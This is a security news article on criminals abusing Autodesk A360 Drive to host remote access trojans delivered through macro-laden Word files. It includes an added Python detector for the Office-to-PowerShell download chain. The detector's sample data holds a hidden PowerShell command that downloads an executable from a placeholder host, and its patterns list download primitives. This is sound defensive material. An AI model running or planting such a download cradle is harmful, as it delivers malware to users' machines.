Autodesk A360 Drive Used to Spread Malware

Cloud-based online storage service Autodesk A360 Drive has been recently abused as a malware delivery platform, according to Trend Micro.

Functioning in a manner similar to that of cloud storage services such as Google Drive, A360 Drive allows a user to create an account for free and benefit from 5 gigabytes of storage space. The service is part of the Autodesk A360 cloud-based workspace, which allows design and engineering teams to share information to desktops, web, and mobile devices.

On A360 Drive, anyone can upload documents via a browser or desktop, and can also share these files by inviting people to view or edit them. Thus, all that a cybercriminal needs to do to abuse the service is to create an account, upload malicious content, and then embed URLs to this content in the chosen entry vector.

In fact, this is exactly what Trend Micro discovered has happened. Miscreants uploaded a plethora of malware to A360 Drive and started spreading it via macro-enabled Microsoft Word documents and other types of files.

One A360 Drive-hosted archive, the security firm says, included an executable (.EXE) file embedded with an obfuscated Visual Basic file hiding a Zeus/Zbot KINS variant beneath. One Java ARchive (JAR) file discovered on the platform contained an executable file archive that pointed to a variant of the NETWIRE remote access tool.

Another JAR file was found to be a variant of jRAT/Adwind, a piece of malware that can retrieve and exfiltrate a variety of data, including credentials, keystrokes, and multimedia files.

According to Trend Micro, some of the files had been hosted on A360 Drive since June 2017, but the practice only surged in August. These files usually contained remote access tools, either obfuscated EXE files or Java archives, and have not been used in targeted attacks to date.

When it comes to the global distribution of the observed malware, the U.S., South Africa, France, Italy, Germany, Hong Kong, and Austria emerge as the most affected countries.

One of the analyzed files was an Office DOC document called AMMO REQUEST MOD Turkey.doc, which was uploaded to VirusTotal on August 24 and was distributed during the same period. Malicious macros included in the document were pointing to a PowerShell script designed to download a file from A360 Drive and execute it.

The downloaded payload, a Visual Basic obfuscated executable file, was found to be the Trojanized version of the Remcos remote access tool (RAT), which is advertised, sold, and offered cracked on various websites and forums. The malware was being distributed mainly in European countries such as Croatia, Germany, Greece, and Turkey.
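As an added example (not code from the article or from Trend Micro), the delivery chain described above can be surfaced from endpoint process-creation telemetry: an Office application spawning PowerShell, a download cradle on the command line, and a URL pointing at a cloud-storage host. The log format, the sample events and the cloud-storage hostname are constructed placeholders; substitute the hostnames your own proxy logs show for A360 Drive and similar services.

```python
"""Flag the macro -> PowerShell -> cloud-storage download chain in
process-creation events. Everything below is constructed sample data."""
import re

# Assumption: placeholder host standing in for A360 Drive and similar services.
CLOUD_STORAGE_HOSTS = ("cloud-storage.example",)
OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe")
# Common PowerShell download primitives seen in download cradles.
DOWNLOAD_CRADLE = re.compile(
    r"(downloadfile|downloadstring|invoke-webrequest|\biwr\b|start-bitstransfer)",
    re.IGNORECASE)
URL_HOST = re.compile(r"https?://([^/\s\"']+)", re.IGNORECASE)

# Constructed events in a simple 'key=value|key=value' format (no '|' in values).
SAMPLE_EVENTS = [
    'Pid=4100|Image=C:\\Program Files\\Microsoft Office\\WINWORD.EXE'
    '|ParentImage=C:\\Windows\\explorer.exe'
    '|CommandLine="WINWORD.EXE" /n "AMMO REQUEST MOD Turkey.doc"',
    'Pid=4212|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'
    '|ParentImage=C:\\Program Files\\Microsoft Office\\WINWORD.EXE'
    "|CommandLine=powershell -w hidden -c (New-Object Net.WebClient)"
    ".DownloadFile('https://cloud-storage.example/d/abc123','%TEMP%\\svc.exe')",
    'Pid=5000|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'
    '|ParentImage=C:\\Windows\\System32\\cmd.exe|CommandLine=powershell Get-Service',
]

def parse_event(line):
    """Split one record into a dict; the first '=' separates key from value."""
    return dict(part.split("=", 1) for part in line.strip().split("|"))

def classify(event):
    """Return the list of indicators matched by a single process-creation event."""
    findings = []
    image = event.get("Image", "").lower().rsplit("\\", 1)[-1]
    parent = event.get("ParentImage", "").lower().rsplit("\\", 1)[-1]
    cmd = event.get("CommandLine", "")
    if image == "powershell.exe" and parent in OFFICE_PARENTS:
        findings.append("office_spawned_powershell")
    if image == "powershell.exe" and DOWNLOAD_CRADLE.search(cmd):
        findings.append("powershell_download_cradle")
    if any(h.lower().endswith(CLOUD_STORAGE_HOSTS) for h in URL_HOST.findall(cmd)):
        findings.append("cloud_storage_url")
    return findings

def scan(lines):
    """Map Pid -> findings for every event that matched at least one indicator."""
    results = {}
    for line in lines:
        event = parse_event(line)
        findings = classify(event)
        if findings:
            results[event["Pid"]] = findings
    return results
```

All three indicators firing on one event is the full chain from the article; a single indicator (for example PowerShell fetching from a cloud-storage host under an administrator's shell) is lower confidence and worth correlating with web-proxy logs.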

Remcos made headlines in February, but it has been used in attacks since 2016. Recently, the RAT has been distributed via a malicious PowerPoint slideshow embedded with an exploit for CVE-2017-0199. In March, the same tool was found on endpoints infected with the MajikPOS point-of-sale (PoS) malware. Apparently, it was used as MajikPOS’s entry point.

“Securing the use of legitimate system administration tools like PowerShell helps mitigate threats and restrict them from being abused. Cloud-based storage platforms are known for being abused, too, and its misuse often allows malicious artifacts into the workplace’s machines. This can be prevented by ensuring that web traffic is scanned within the enterprise,” Trend Micro notes.

The security firm informed Autodesk of its findings and says the two have been working together on taking “down the abused URLs and deploying additional countermeasures to prevent further abuse of A360 Drive.”

Related: PowerPoint Slide Show Files Used to Install Malware

Related: Easy-to-Use Remcos RAT Spotted in Live Attacks

Written By

Ionut Arghire is an international correspondent for SecurityWeek.
